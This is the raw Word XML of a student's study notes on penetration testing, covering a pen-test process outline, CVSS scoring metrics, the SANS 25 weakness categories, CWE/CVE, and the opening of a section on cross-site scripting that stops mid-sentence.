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A6EBC" w14:textId="74206450" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Definitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF509D0" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zero Day Attack: Attacks which have no current fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F861701" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pen Tester/Ethical Hacker: Employees who simulate attacks on a system to help improve security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D3BCF" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vulnerability Assessment: An automated scanning product which probes the port and services on IP addresses. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76754797" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Scripting(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>XSS): When an application accepts untrustworthy data and sends it to a browser without validation or escaping, allowing attackers to execute script in the victims browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366FB4BB" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F39A700" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:r>
        <w:t>Pen Test Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8928E" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set ground rules </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AB061D" w14:textId="339B39D8" w:rsidR="008C74CC" w:rsidRDefault="00543599" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="008C74CC">
        <w:t>tart/end and blackout dates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1646AD" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Approvals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A220E9" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify and alert parties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD537C0" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set expectations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C8A7EE" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Passive Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DF0D82" w14:textId="4D0BB918" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get info about target</w:t>
      </w:r>
      <w:r w:rsidR="00543599">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00543599">
        <w:t>Open Source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00543599">
        <w:t xml:space="preserve"> Intelligence (OSINT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031608F9" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Active  Scanning</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62FCA3" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure out </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>targets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> public exposure via tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138304A9" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fingerprinting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24569326" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify OS type and patch, Application and patch level, open ports account and running services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857E4C9" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select Target System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0AD8A" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit uncovered vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E5BA8" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4EEB50" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F470938" w14:textId="20B702C5" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:r>
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5758272B" w14:textId="302B157D" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Zed Attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Proxy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">ZAP): </w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:t>A free tool for automated and manual testing of web application vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73777F3F" w14:textId="52A321E5" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CVSS(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">Common Vulnerability Scoring System): Assess security vulnerabilities by assigning scores to vulnerabilities which are calculated using a formula dependant on several metrics (scores range from 0 to 10) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A599909" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Base score compromised of: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50BF91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 xml:space="preserve">Attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Vector(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>AV): Where vulnerability exploitation is possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D1FA96" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>As one moves from physical to network: score increases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30872F53" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Compromised </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>of :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D2F4D08" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Network: Vulnerable component bound to network stack and their path is via OSI layer 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB097E" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Adjacent: Limited to shared physical network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97FB97" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Local: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A14D21">
        <w:t>Not bound to the network stack. Either the attacker has logged in locally or needs user interaction to execute the exp</w:t>
      </w:r>
      <w:r>
        <w:t>loit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279BC160" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Physical: Attacker needs to physically manipulate vulnerable component   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D563A8C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 xml:space="preserve">Attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Complexity(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">AC): Conditions beyond attacks control which must exist to exploit vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1010C8F5" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Either Low or High metrics. This means there is either no conditions/special conditions or is extremely dependant on them, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA060A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 xml:space="preserve">Privileges Required (PR)L Level of privileges an attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>needs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Score </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>increase</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with fewer privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C69FD4" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Can be either Low, High or None values. This means for exploit to be successful, needs either no, basic or high level of access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EE3499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>UI: Does an attack need another use to interact with something to exploit vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64AE58" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>None or Required Interaction for exploits success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20813ADD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>Scope (S): Does the vulnerability impact resources beyond means and privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC0269" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unchanged or Change scope means that the exploit effects either the confines of system or beyond it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB52C9D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>Confidentiality (C): If information is disclosed to an unauthorised user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D8542" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> None, High or Low. Indicates how much info is leaked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E297E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>Integrity (I): If veracity/trustworthiness of info maintained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A8B8F" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>None, High or Low values. These indicate how much integrity is lost and how serious of an impact it is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808BD0D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 xml:space="preserve">Availability (A): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224955DF" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Can a component be taken down, even partially, by exploit. Can either be totally taken </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>offline(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>High) or just have reduced performance(Low)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726FFDB0" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A14D21">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D64332F" wp14:editId="180C81CC">
            <wp:extent cx="5039428" cy="1914792"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="14449198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1986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376F" w14:textId="648BD9AC" w:rsidR="00237FBB" w:rsidRDefault="00237FBB" w:rsidP="00237FBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OWASP (Open Web Application Security Project) is an online community which creates articles, methodologies, tools and documents for the web application security sector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B5060C" w14:textId="12CBF769" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SysAsmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Audit, Network &amp; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Security(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">SANS): Private US company which specialises in training for info security and cyber security </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB5CDC2" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SANS 25(List of common dangerous errors):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A34551" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Insecure interaction between components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA73D52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>SQL Injection: Improper neutralisation of Special Elements used in SQL commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8473B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 xml:space="preserve">OS Command injection: Improper neutralisation od special elements in OS command line  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26019779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 xml:space="preserve">Cross Site scripting: Improper Neutralisation of input during web page generation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261CCC4F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>Unrestricted Upload of file with a dangerous type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6B3E3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>Cross site request forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBFE659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>URL redirections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4F132" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Resource Management Risks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5F797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</w:pPr>
      <w:r w:rsidRPr="00E0422F">
        <w:t>Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068808F7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</w:pPr>
      <w:r w:rsidRPr="00E0422F">
        <w:t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCCAC8C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</w:pPr>
      <w:r w:rsidRPr="00E0422F">
        <w:t>Download of Code Without Integrity Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66042EE7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</w:pPr>
      <w:r w:rsidRPr="00E0422F">
        <w:t>Inclusion of Functionality from Untrusted Control Sphere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49884F06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</w:pPr>
      <w:r w:rsidRPr="00E0422F">
        <w:t>Use of Potentially Dangerous Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4C83BB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</w:pPr>
      <w:r w:rsidRPr="00E0422F">
        <w:t>Incorrect Calculation of Buffer Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B665BA6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</w:pPr>
      <w:r w:rsidRPr="00E0422F">
        <w:t>Uncontrolled Format String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6CA6B" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E0422F">
        <w:t>Integer Overflow or Wraparound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B203FEA" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Porous Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F40D410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Missing Authentication for Critical Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551464C5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Missing Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6AB62E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Use of Hard-coded Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADBC9AB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Missing Encryption of Sensitive Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD47F7D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lastRenderedPageBreak/>
        <w:t>Reliance on Untrusted Inputs in a Security Decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B9423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Execution with Unnecessary Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DEBF41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Incorrect Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C17D3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Incorrect Permission Assignment for Critical Resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410AD31E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Use of a Broken or Risky Cryptographic Algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751FB17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Improper Restriction of Excessive Authentication Attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A8F59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Use of a One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-</w:t>
      </w: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Way Hash without a Salt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA3C0C" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CWE (Common Weakness Enumeration: Developed list of common software security weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DE75CB" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Common Vulnerability and Exposures (CVE): Dictionary of known info security vulnerabilities and exposure. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D442247" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE2E84C" w14:textId="7F5C3B44" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:r>
        <w:t xml:space="preserve">Cross Site </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Scripting(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0FF66E" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How XSS works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316DB90C" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker can craft malicious </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>URL(</w:t>
      </w:r>
